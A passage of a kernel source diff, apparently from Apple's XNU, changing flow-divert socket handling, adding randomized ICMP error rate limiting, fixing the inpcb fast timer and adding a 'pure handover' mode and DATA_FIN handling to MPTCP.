@@ flow_divert_handle_close(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offse } else if (how == SHUT_WR) { socantsendmore(fd_cb->so); } - +done: socket_unlock(fd_cb->so, 0); } FDUNLOCK(fd_cb); @@ -2457,6 +2549,11 @@ flow_divert_handle_data(struct flow_divert_pcb *fd_cb, mbuf_t packet, size_t off socket_lock(fd_cb->so, 0); + if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) { + FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring inbound data"); + goto done; + } + if (sbspace(&fd_cb->so->so_rcv) == 0) { error = ENOBUFS; fd_cb->flags |= FLOW_DIVERT_NOTIFY_ON_RECEIVED; @@ -2574,8 +2671,15 @@ flow_divert_handle_read_notification(struct flow_divert_pcb *fd_cb, mbuf_t packe FDLOCK(fd_cb); if (fd_cb->so != NULL) { socket_lock(fd_cb->so, 0); + + if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) { + FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring read notification"); + goto done; + } + fd_cb->send_window += ntohl(read_count); flow_divert_send_buffered_data(fd_cb, FALSE); +done: socket_unlock(fd_cb->so, 0); } FDUNLOCK(fd_cb); @@ -2655,25 +2759,14 @@ flow_divert_handle_properties_update(struct flow_divert_pcb *fd_cb, mbuf_t packe if (fd_cb->so != NULL) { socket_lock(fd_cb->so, 0); - if (out_if_index > 0) { - struct inpcb *inp = NULL; - struct ifnet *ifp = NULL; - - inp = sotoinpcb(fd_cb->so); - - ifnet_head_lock_shared(); - if (out_if_index <= if_index) { - ifp = ifindex2ifnet[out_if_index]; - } + if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) { + FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring properties update"); + goto done; + } - if (ifp != NULL) { - if (inp->inp_vflag & INP_IPV4) { - inp->inp_last_outifp = ifp; - } else if (inp->inp_vflag & INP_IPV6) { - inp->in6p_last_outifp = ifp; - } - } - ifnet_head_done(); + if (out_if_index > 0) { + flow_divert_scope(fd_cb, out_if_index, true); + flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa)); } if (app_data_length > 0) { @@ -2695,7 +2788,7 @@ flow_divert_handle_properties_update(struct flow_divert_pcb *fd_cb, mbuf_t packe FDLOG(LOG_ERR, fd_cb, "Failed to allocate a buffer of size %u to hold the application data from the properties update", app_data_length); } } - +done: socket_unlock(fd_cb->so, 0); } FDUNLOCK(fd_cb); @@ -3336,6 +3429,13 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t goto done; } + if (SOCK_TYPE(so) == SOCK_STREAM || /* TCP or */ + !implicit || /* connect() was called or */ + ((inp->inp_vflag & INP_IPV6) && !IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr)) || /* local address is not un-specified */ + ((inp->inp_vflag & INP_IPV4) && inp->inp_laddr.s_addr != INADDR_ANY)) { + fd_cb->flags |= FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR; + } + error = flow_divert_create_connect_packet(fd_cb, to, so, p, &connect_packet); if (error) { goto done; @@ -3343,7 +3443,7 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t if (!implicit || SOCK_TYPE(so) == SOCK_STREAM) { flow_divert_set_remote_endpoint(fd_cb, to); - flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa), false); + flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa)); } if (implicit) { @@ -3370,7 +3470,7 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t fd_cb->flags |= FLOW_DIVERT_CONNECT_STARTED; } - if (SOCK_TYPE(so) == SOCK_DGRAM) { + if (SOCK_TYPE(so) == SOCK_DGRAM && !(fd_cb->flags & FLOW_DIVERT_HAS_TOKEN)) { soisconnected(so); } else { soisconnecting(so); @@ -3521,11 +3621,6 @@ flow_divert_data_out(struct socket *so, int flags, mbuf_t data, struct sockaddr if (error) { goto done; } - - if (so->so_flags1 & SOF1_DATA_IDEMPOTENT) { - /* Open up the send window so that the data will get sent right away */ - fd_cb->send_window = (uint32_t)mbuf_pkthdr_len(data); - } } else { error = flow_divert_check_no_cellular(fd_cb) || flow_divert_check_no_expensive(fd_cb) || @@ -3798,6 +3893,8 @@ flow_divert_token_set(struct socket *so, struct sockopt *sopt) fd_cb->connect_token = token; token = NULL; + + fd_cb->flags |= FLOW_DIVERT_HAS_TOKEN; } if (hmac_error == 0) { diff --git a/bsd/netinet/icmp6.h b/bsd/netinet/icmp6.h index 5c3207167..f24f47658 100644 --- a/bsd/netinet/icmp6.h +++ b/bsd/netinet/icmp6.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2000-2019 Apple Inc. All rights reserved. + * Copyright (c) 2000-2020 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -694,7 +694,8 @@ struct icmp6stat { #define ICMPV6CTL_ND6_MAXQLEN 24 #define ICMPV6CTL_ND6_ACCEPT_6TO4 25 #define ICMPV6CTL_ND6_OPTIMISTIC_DAD 26 /* RFC 4429 */ -#define ICMPV6CTL_MAXID 27 +#define ICMPV6CTL_ERRPPSLIMIT_RANDOM_INCR 27 +#define ICMPV6CTL_MAXID 28 #ifdef BSD_KERNEL_PRIVATE #define ICMPV6CTL_NAMES { \ diff --git a/bsd/netinet/icmp_var.h b/bsd/netinet/icmp_var.h index 42982241e..3a45a787e 100644 --- a/bsd/netinet/icmp_var.h +++ b/bsd/netinet/icmp_var.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2000-2013 Apple Inc. All rights reserved. + * Copyright (c) 2000-2020 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -93,7 +93,8 @@ struct icmpstat { #define ICMPCTL_STATS 2 /* statistics (read-only) */ #define ICMPCTL_ICMPLIM 3 #define ICMPCTL_TIMESTAMP 4 /* allow replies to time stamp requests */ -#define ICMPCTL_MAXID 5 +#define ICMPCTL_ICMPLIM_INCR 5 +#define ICMPCTL_MAXID 6 #ifdef BSD_KERNEL_PRIVATE #define ICMPCTL_NAMES { \ diff --git a/bsd/netinet/in_pcb.c b/bsd/netinet/in_pcb.c index ef0731a82..6fd6e7121 100644 --- a/bsd/netinet/in_pcb.c +++ b/bsd/netinet/in_pcb.c @@ -331,8 +331,9 @@ in_pcbinit(void) lck_mtx_init(&inpcb_timeout_lock, inpcb_lock_grp, inpcb_lock_attr); inpcb_thread_call = thread_call_allocate_with_priority(inpcb_timeout, NULL, THREAD_CALL_PRIORITY_KERNEL); + /* Give it an arg so that we know that this is the fast timer */ inpcb_fast_thread_call = thread_call_allocate_with_priority( - inpcb_timeout, NULL, THREAD_CALL_PRIORITY_KERNEL); + inpcb_timeout, &inpcb_timeout, THREAD_CALL_PRIORITY_KERNEL); if (inpcb_thread_call == NULL || inpcb_fast_thread_call == NULL) { panic("unable to alloc the inpcb thread call"); } @@ -353,7 +354,7 @@ in_pcbinit(void) static void inpcb_timeout(void *arg0, void *arg1) { -#pragma unused(arg0, arg1) +#pragma unused(arg1) struct inpcbinfo *ipi; boolean_t t, gc; struct intimercount gccnt, tmcnt; @@ -419,10 +420,14 @@ inpcb_timeout(void *arg0, void *arg1) inpcb_ticking = INPCB_HAVE_TIMER_REQ(tmcnt); } - /* re-arm the timer if there's work to do */ + /* arg0 will be set if we are the fast timer */ + if (arg0 != NULL) { + inpcb_fast_timer_on = FALSE; + } inpcb_timeout_run--; VERIFY(inpcb_timeout_run >= 0 && inpcb_timeout_run < 2); + /* re-arm the timer if there's work to do */ if (gccnt.intimer_nodelay > 0 || tmcnt.intimer_nodelay > 0) { inpcb_sched_timeout(); } else if ((gccnt.intimer_fast + tmcnt.intimer_fast) <= 5) { @@ -460,7 +465,7 @@ _inpcb_sched_timeout(unsigned int offset) inpcb_timeout_run++; if (offset == 0) { inpcb_fast_timer_on = TRUE; - thread_call_enter_delayed(inpcb_thread_call, + thread_call_enter_delayed(inpcb_fast_thread_call, deadline); } else { inpcb_fast_timer_on = FALSE; diff --git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h index b7b32693a..f4d981849 100644 --- a/bsd/netinet/in_pcb.h +++ b/bsd/netinet/in_pcb.h @@ -80,6 +80,9 @@ #include #include #endif /* BSD_KERNEL_PRIVATE */ +#if !KERNEL +#include +#endif #if IPSEC #include /* for IPSEC */ @@ -370,7 +373,7 @@ struct xinpcb { u_quad_t xi_alignment_hack; }; -#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) +#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) struct inpcb64_list_entry { u_int64_t le_next; u_int64_t le_prev; @@ -412,7 +415,7 @@ struct xinpcb64 { struct xsocket64 xi_socket; u_quad_t xi_alignment_hack; }; -#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ +#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ #ifdef PRIVATE struct xinpcb_list_entry { diff --git a/bsd/netinet/in_systm.h b/bsd/netinet/in_systm.h index 800ec7cfb..1a97eb8c0 100644 --- a/bsd/netinet/in_systm.h +++ b/bsd/netinet/in_systm.h @@ -63,7 +63,11 @@ #ifndef _NETINET_IN_SYSTM_H_ #define _NETINET_IN_SYSTM_H_ + +#ifndef DRIVERKIT #include +#endif /* DRIVERKIT */ + #include /* diff --git a/bsd/netinet/ip_icmp.c b/bsd/netinet/ip_icmp.c index 14aa9c960..0fb3d6f75 100644 --- a/bsd/netinet/ip_icmp.c +++ b/bsd/netinet/ip_icmp.c @@ -141,7 +141,6 @@ SYSCTL_INT(_net_inet_icmp, OID_AUTO, log_redirect, const static int icmp_datalen = 8; #if ICMP_BANDLIM - /* Default values in case CONFIG_ICMP_BANDLIM is not defined in the MASTER file */ #ifndef CONFIG_ICMP_BANDLIM #if XNU_TARGET_OS_OSX @@ -159,15 +158,16 @@ const static int icmp_datalen = 8; static int icmplim = CONFIG_ICMP_BANDLIM; SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM, icmplim, CTLFLAG_RW | CTLFLAG_LOCKED, &icmplim, 0, ""); - #else /* ICMP_BANDLIM */ - static int icmplim = -1; SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM, icmplim, CTLFLAG_RD | CTLFLAG_LOCKED, &icmplim, 0, ""); - #endif /* ICMP_BANDLIM */ +static int icmplim_random_incr = CONFIG_ICMP_BANDLIM; +SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM_INCR, icmplim_random_incr, CTLFLAG_RW | CTLFLAG_LOCKED, + &icmplim_random_incr, 0, ""); + /* * ICMP broadcast echo sysctl */ @@ -1074,11 +1074,8 @@ ip_next_mtu(int mtu, int dir) /* * badport_bandlim() - check for ICMP bandwidth limit - * - * Return 0 if it is ok to send an ICMP error response, -1 if we have - * hit our bandwidth limit and it is not ok. - * - * If icmplim is <= 0, the feature is disabled and 0 is returned. + * Returns false when it is ok to send ICMP error and true to limit sending + * of ICMP error. * * For now we separate the TCP and UDP subsystems w/ different 'which' * values. We may eventually remove this separation (and simplify the @@ -1098,7 +1095,8 @@ badport_bandlim(int which) static int lpackets[BANDLIM_MAX + 1]; uint64_t time; uint64_t secs; - + static boolean_t is_initialized = FALSE; + static int icmplim_random; const char *bandlimittype[] = { "Limiting icmp unreach response", "Limiting icmp ping response", @@ -1113,6 +1111,14 @@ badport_bandlim(int which) return false; } + if (is_initialized == FALSE) { + if (icmplim_random_incr > 0 && + icmplim <= INT32_MAX - (icmplim_random_incr + 1)) { + icmplim_random = icmplim + (random() % icmplim_random_incr) + 1; + } + is_initialized = TRUE; + } + time = net_uptime(); secs = time - lticks[which]; @@ -1121,11 +1127,11 @@ badport_bandlim(int which) */ if (secs > 1) { - if (lpackets[which] > icmplim) { + if (lpackets[which] > icmplim_random) { printf("%s from %d to %d packets per second\n", bandlimittype[which], lpackets[which], - icmplim + icmplim_random ); } lticks[which] = time; @@ -1135,9 +1141,16 @@ badport_bandlim(int which) /* * bump packet count */ - - if (++lpackets[which] > icmplim) { - return true; + if (++lpackets[which] > icmplim_random) { + /* + * After hitting the randomized limit, we further randomize the + * behavior of how we apply rate limitation. + * We rate limit based on probability that increases with the + * increase in lpackets[which] count. + */ + if ((random() % (lpackets[which] - icmplim_random)) != 0) { + return true; + } } return false; } diff --git a/bsd/netinet/mptcp.c b/bsd/netinet/mptcp.c index 39fabb2b1..85a8cebc1 100644 --- a/bsd/netinet/mptcp.c +++ b/bsd/netinet/mptcp.c @@ -792,7 +792,7 @@ mptcp_subflow_is_slow(struct mptses *mpte, struct mptsub *mpts) struct tcpcb *tp = sototcpcb(mpts->mpts_socket); int fail_thresh = mptcp_fail_thresh; - if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { + if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { fail_thresh *= 2; } @@ -908,7 +908,9 @@ mptcp_get_subflow(struct mptses *mpte, struct mptsub **preferred) * Second Step: Among best and second_best. Choose the one that is * most appropriate for this particular service-type. */ - if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { + if (mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { + return mptcp_return_subflow(best); + } else if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { /* * Only handover if Symptoms tells us to do so. */ @@ -1363,16 +1365,6 @@ mptcp_handle_deferred_upcalls(struct mppcb *mpp, uint32_t flag) } } -void -mptcp_ask_for_nat64(struct ifnet *ifp) -{ - in6_post_msg(ifp, KEV_INET6_REQUEST_NAT64_PREFIX, NULL, NULL); - - os_log_info(mptcp_log_handle, - "%s: asked for NAT64-prefix on %s\n", __func__, - ifp->if_name); -} - static void mptcp_reset_itfinfo(struct mpt_itf_info *info) { @@ -1517,7 +1509,7 @@ mptcp_session_necp_cb(void *handle, int action, uint32_t interface_index, } dst = mptcp_get_session_dst(mpte, has_v6, has_v4); - if (dst && (dst->sa_family == AF_INET || dst->sa_family == 0) && + if (dst && dst->sa_family == AF_INET && has_v6 && !has_nat64 && !has_v4) { if (found_slot) { mpte->mpte_itfinfo[slot_index].ifindex = ifindex; @@ -1525,7 +1517,6 @@ mptcp_session_necp_cb(void *handle, int action, uint32_t interface_index, mpte->mpte_itfinfo[slot_index].has_v6_conn = has_v6; mpte->mpte_itfinfo[slot_index].has_nat64_conn = has_nat64; } - mptcp_ask_for_nat64(ifp); goto out; } diff --git a/bsd/netinet/mptcp_opt.c b/bsd/netinet/mptcp_opt.c index 2767e5636..31552007b 100644 --- a/bsd/netinet/mptcp_opt.c +++ b/bsd/netinet/mptcp_opt.c @@ -137,7 +137,7 @@ mptcp_setup_join_subflow_syn_opts(struct socket *so, u_char *opt, unsigned optle if (tp->t_mpflags & TMPF_BACKUP_PATH) { mpjoin_req.mmjo_subtype_bkp |= MPTCP_BACKUP; } else if (inp->inp_boundifp && IFNET_IS_CELLULAR(inp->inp_boundifp) && - mpts->mpts_mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) { + mptcp_subflows_need_backup_flag(mpts->mpts_mpte)) { mpjoin_req.mmjo_subtype_bkp |= MPTCP_BACKUP; tp->t_mpflags |= TMPF_BACKUP_PATH; } else { @@ -974,6 +974,10 @@ mptcp_do_mpcapable_opt(struct tcpcb *tp, u_char *cp, struct tcphdr *th, if (((struct mptcp_mpcapable_opt_common *)cp)->mmco_flags & MPCAP_UNICAST_IPBIT) { mpte->mpte_flags |= MPTE_UNICAST_IP; + + /* We need an explicit signal for the addresses - zero the existing ones */ + memset(&mpte->mpte_sub_dst_v4, 0, sizeof(mpte->mpte_sub_dst_v4)); + memset(&mpte->mpte_sub_dst_v6, 0, sizeof(mpte->mpte_sub_dst_v6)); } rsp = (struct mptcp_mpcapable_opt_rsp *)cp; @@ -1426,6 +1430,8 @@ mptcp_do_dss_opt(struct tcpcb *tp, u_char *cp, struct tcphdr *th) if (dss_rsp->mdss_subtype == MPO_DSS) { if (dss_rsp->mdss_flags & MDSS_F) { tp->t_rcv_map.mpt_dfin = 1; + } else { + tp->t_rcv_map.mpt_dfin = 0; } mptcp_do_dss_opt_meat(cp, tp, th); @@ -1548,7 +1554,7 @@ mptcp_do_add_addr_opt(struct mptses *mpte, u_char *cp) } if (addr_opt->maddr_len == MPTCP_ADD_ADDR_OPT_LEN_V4) { - struct sockaddr_in *dst = &mpte->mpte_dst_unicast_v4; + struct sockaddr_in *dst = &mpte->mpte_sub_dst_v4; struct in_addr *addr = &addr_opt->maddr_u.maddr_addrv4; in_addr_t haddr = ntohl(addr->s_addr); @@ -1573,7 +1579,7 @@ mptcp_do_add_addr_opt(struct mptses *mpte, u_char *cp) dst->sin_port = mpte->__mpte_dst_v4.sin_port; dst->sin_addr.s_addr = addr->s_addr; } else { - struct sockaddr_in6 *dst = &mpte->mpte_dst_unicast_v6; + struct sockaddr_in6 *dst = &mpte->mpte_sub_dst_v6; struct in6_addr *addr = &addr_opt->maddr_u.maddr_addrv6; if (IN6_IS_ADDR_LINKLOCAL(addr) || diff --git a/bsd/netinet/mptcp_subr.c b/bsd/netinet/mptcp_subr.c index f00002616..3ea459376 100644 --- a/bsd/netinet/mptcp_subr.c +++ b/bsd/netinet/mptcp_subr.c @@ -495,27 +495,23 @@ mptcp_session_create(struct mppcb *mpp) struct sockaddr * mptcp_get_session_dst(struct mptses *mpte, boolean_t ipv6, boolean_t ipv4) { - if (!(mpte->mpte_flags & MPTE_UNICAST_IP)) { - return &mpte->mpte_dst; + if (ipv6 && mpte->mpte_sub_dst_v6.sin6_family == AF_INET6) { + return (struct sockaddr *)&mpte->mpte_sub_dst_v6; } - if (ipv6 && mpte->mpte_dst_unicast_v6.sin6_family == AF_INET6) { - return (struct sockaddr *)&mpte->mpte_dst_unicast_v6; - } - - if (ipv4 && mpte->mpte_dst_unicast_v4.sin_family == AF_INET) { - return (struct sockaddr *)&mpte->mpte_dst_unicast_v4; + if (ipv4 && mpte->mpte_sub_dst_v4.sin_family == AF_INET) { + return (struct sockaddr *)&mpte->mpte_sub_dst_v4; } /* The interface has neither IPv4 nor IPv6 routes. Give our best guess, * meaning we prefer IPv6 over IPv4. */ - if (mpte->mpte_dst_unicast_v6.sin6_family == AF_INET6) { - return (struct sockaddr *)&mpte->mpte_dst_unicast_v6; + if (mpte->mpte_sub_dst_v6.sin6_family == AF_INET6) { + return (struct sockaddr *)&mpte->mpte_sub_dst_v6; } - if (mpte->mpte_dst_unicast_v4.sin_family == AF_INET) { - return (struct sockaddr *)&mpte->mpte_dst_unicast_v4; + if (mpte->mpte_sub_dst_v4.sin_family == AF_INET) { + return (struct sockaddr *)&mpte->mpte_sub_dst_v4; } /* We don't yet have a unicast IP */ @@ -883,6 +879,7 @@ mptcp_check_subflows_and_add(struct mptses *mpte) return; } + /* Just to see if we have an IP-address available */ if (mptcp_get_session_dst(mpte, false, false) == NULL) { return; } @@ -921,6 +918,13 @@ mptcp_check_subflows_and_add(struct mptses *mpte) if (IFNET_IS_CELLULAR(ifp)) { cellular_viable = TRUE; + + if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || + mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { + if (!mptcp_is_wifi_unusable_for_session(mpte)) { + continue; + } + } } TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) { @@ -943,10 +947,11 @@ mptcp_check_subflows_and_add(struct mptses *mpte) need_to_ask_symptoms = TRUE; } - if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { + if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { os_log(mptcp_log_handle, - "%s - %lx: handover: cell %u wifi-state %d flags %#x rxt %u first-party %u sb_cc %u ifindex %u this %u rtt %u rttvar %u rto %u\n", + "%s - %lx: %s: cell %u wifi-state %d flags %#x rxt %u first-party %u sb_cc %u ifindex %u this %u rtt %u rttvar %u rto %u\n", __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), + mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER ? "handover" : "pure-handover", IFNET_IS_CELLULAR(subifp), mptcp_is_wifi_unusable_for_session(mpte), mpts->mpts_flags, @@ -1058,13 +1063,6 @@ mptcp_check_subflows_and_add(struct mptses *mpte) dst = (struct sockaddr *)&nat64pre; } - /* Initial subflow started on a NAT64'd address? */ - if (!(mpte->mpte_flags & MPTE_UNICAST_IP) && - mpte->mpte_dst.sa_family == AF_INET6 && - mpte->mpte_dst_v4_nat64.sin_family == AF_INET) { - dst = (struct sockaddr *)&mpte->mpte_dst_v4_nat64; - } - if (dst->sa_family == AF_INET && !info->has_v4_conn) { continue; } @@ -1085,36 +1083,36 @@ static void mptcp_remove_cell_subflows(struct mptses *mpte) { struct mptsub *mpts, *tmpts; - boolean_t found = false; - TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) { + TAILQ_FOREACH_SAFE(mpts, &mpte->mpte_subflows, mpts_entry, tmpts) { const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp; - if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) { + if (ifp == NULL || !IFNET_IS_CELLULAR(ifp)) { continue; } - /* We have a functioning subflow on WiFi. No need for cell! */ - if (mpts->mpts_flags & MPTSF_CONNECTED && - !mptcp_subflow_disconnecting(mpts)) { - found = true; - } - } + os_log(mptcp_log_handle, "%s - %lx: removing cell subflow\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte)); - /* Didn't found functional sub on WiFi - stay on cell */ - if (!found) { - return; + soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST); } + return; +} + +static void +mptcp_remove_wifi_subflows(struct mptses *mpte) +{ + struct mptsub *mpts, *tmpts; + TAILQ_FOREACH_SAFE(mpts, &mpte->mpte_subflows, mpts_entry, tmpts) { const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp; - /* Only remove cellular subflows */ - if (ifp == NULL || !IFNET_IS_CELLULAR(ifp)) { + if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) { continue; } - os_log(mptcp_log_handle, "%s - %lx: removing cell subflow\n", + os_log(mptcp_log_handle, "%s - %lx: removing wifi subflow\n", __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte)); soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST); @@ -1123,7 +1121,69 @@ mptcp_remove_cell_subflows(struct mptses *mpte) return; } -/* Returns true if it removed a subflow on cell */ +static void +mptcp_pure_handover_subflows_remove(struct mptses *mpte) +{ + int wifi_unusable = mptcp_is_wifi_unusable_for_session(mpte); + boolean_t found_working_wifi_subflow = false; + boolean_t found_working_cell_subflow = false; + + struct mptsub *mpts; + + /* + * Look for a subflow that is on a non-cellular interface in connected + * state. + * + * In that case, remove all cellular subflows. + * + * If however there is no connected subflow + */ + TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) { + const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp; + struct socket *so; + struct tcpcb *tp; + + if (ifp == NULL) { + continue; + } + + so = mpts->mpts_socket; + tp = sototcpcb(so); + + if (!(mpts->mpts_flags & MPTSF_CONNECTED) || + tp->t_state != TCPS_ESTABLISHED || + mptcp_subflow_disconnecting(mpts)) { + continue; + } + + if (IFNET_IS_CELLULAR(ifp)) { + found_working_cell_subflow = true; + } else { + os_log_debug(mptcp_log_handle, "%s - %lx: rxt %u sb_cc %u unusable %d\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), tp->t_rxtshift, mptetoso(mpte)->so_snd.sb_cc, wifi_unusable); + if (!mptcp_handover_use_cellular(mpte, tp)) { + found_working_wifi_subflow = true; + } + } + } + + /* + * Couldn't find a working subflow, let's not remove those on a cellular + * interface. + */ + os_log_debug(mptcp_log_handle, "%s - %lx: Found Wi-Fi: %u Found Cellular %u", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), + found_working_wifi_subflow, found_working_cell_subflow); + if (!found_working_wifi_subflow && wifi_unusable) { + if (found_working_cell_subflow) { + mptcp_remove_wifi_subflows(mpte); + } + return; + } + + mptcp_remove_cell_subflows(mpte); +} + static void mptcp_handover_subflows_remove(struct mptses *mpte) { @@ -1176,6 +1236,7 @@ static void mptcp_targetbased_subflows_remove(struct mptses *mpte) { uint64_t time_now = mach_continuous_time(); + struct mptsub *mpts; if (mpte->mpte_time_target != 0 && (int64_t)(mpte->mpte_time_target - time_now) <= 0 && @@ -1184,7 +1245,20 @@ mptcp_targetbased_subflows_remove(struct mptses *mpte) return; } - mptcp_remove_cell_subflows(mpte); + TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) { + const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp; + + if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) { + continue; + } + + /* We have a functioning subflow on WiFi. No need for cell! */ + if (mpts->mpts_flags & MPTSF_CONNECTED && + !mptcp_subflow_disconnecting(mpts)) { + mptcp_remove_cell_subflows(mpte); + break; + } + } } /* @@ -1200,6 +1274,10 @@ mptcp_check_subflows_and_remove(struct mptses *mpte) socket_lock_assert_owned(mptetoso(mpte)); + if (mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { + mptcp_pure_handover_subflows_remove(mpte); + } + if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { mptcp_handover_subflows_remove(mpte); } @@ -1542,6 +1620,7 @@ mptcp_subflow_necp_cb(void *handle, __unused int action, mptcp_sched_create_subflows(mpte); if ((mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || + mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER || mpte->mpte_svctype == MPTCP_SVCTYPE_TARGET_BASED) && viable != NULL) { *viable = 1; @@ -1639,6 +1718,9 @@ mptcp_subflow_socreate(struct mptses *mpte, struct mptsub *mpts, int dom, if (mp_so->so_flags1 & SOF1_DATA_IDEMPOTENT) { (*so)->so_flags1 |= SOF1_DATA_IDEMPOTENT; } + if (mp_so->so_flags1 & SOF1_DATA_AUTHENTICATED) { + (*so)->so_flags1 |= SOF1_DATA_AUTHENTICATED; + } /* Inherit uuid and create the related flow. */ if (!uuid_is_null(mpsotomppcb(mp_so)->necp_client_uuid)) { @@ -1920,7 +2002,7 @@ mptcp_subflow_soconnectx(struct mptses *mpte, struct mptsub *mpts) static int mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn, - uint32_t rseq, uint16_t dlen) + uint32_t rseq, uint16_t dlen, uint8_t dfin) { struct mptsub *mpts = sototcpcb(so)->t_mpsub; @@ -1935,12 +2017,14 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn, if (m->m_pkthdr.pkt_flags & PKTF_MPTCP) { if (off && (dsn != m->m_pkthdr.mp_dsn || rseq != m->m_pkthdr.mp_rseq || - dlen != m->m_pkthdr.mp_rlen)) { - os_log_error(mptcp_log_handle, "%s - %lx: Received incorrect second mapping: %u - %u , %u - %u, %u - %u\n", + dlen != m->m_pkthdr.mp_rlen || + dfin != !!(m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN))) { + os_log_error(mptcp_log_handle, "%s - %lx: Received incorrect second mapping: DSN: %u - %u , SSN: %u - %u, DLEN: %u - %u, DFIN: %u - %u\n", __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpts->mpts_mpte), (uint32_t)dsn, (uint32_t)m->m_pkthdr.mp_dsn, rseq, m->m_pkthdr.mp_rseq, - dlen, m->m_pkthdr.mp_rlen); + dlen, m->m_pkthdr.mp_rlen, + dfin, !!(m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN)); soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST); return -1; @@ -1948,12 +2032,12 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn, } /* If mbuf is beyond right edge of the mapping, we need to split */ - if (m_pktlen(m) > dlen - off) { - struct mbuf *new = m_split(m, dlen - off, M_DONTWAIT); + if (m_pktlen(m) > dlen - dfin - off) { + struct mbuf *new = m_split(m, dlen - dfin - off, M_DONTWAIT); if (new == NULL) { - os_log_error(mptcp_log_handle, "%s - %lx: m_split failed dlen %u off %d pktlen %d, killing subflow %d", + os_log_error(mptcp_log_handle, "%s - %lx: m_split failed dlen %u dfin %u off %d pktlen %d, killing subflow %d", __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpts->mpts_mpte), - dlen, off, m_pktlen(m), + dlen, dfin, off, m_pktlen(m), mpts->mpts_connid); soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST); @@ -1973,10 +2057,19 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn, m->m_pkthdr.pkt_flags |= PKTF_MPTCP; m->m_pkthdr.mp_dsn = dsn + off; m->m_pkthdr.mp_rseq = rseq + off; - VERIFY(m_pktlen(m) < UINT16_MAX); m->m_pkthdr.mp_rlen = (uint16_t)m_pktlen(m); + /* Only put the DATA_FIN-flag on the last mbuf of this mapping */ + if (dfin) { 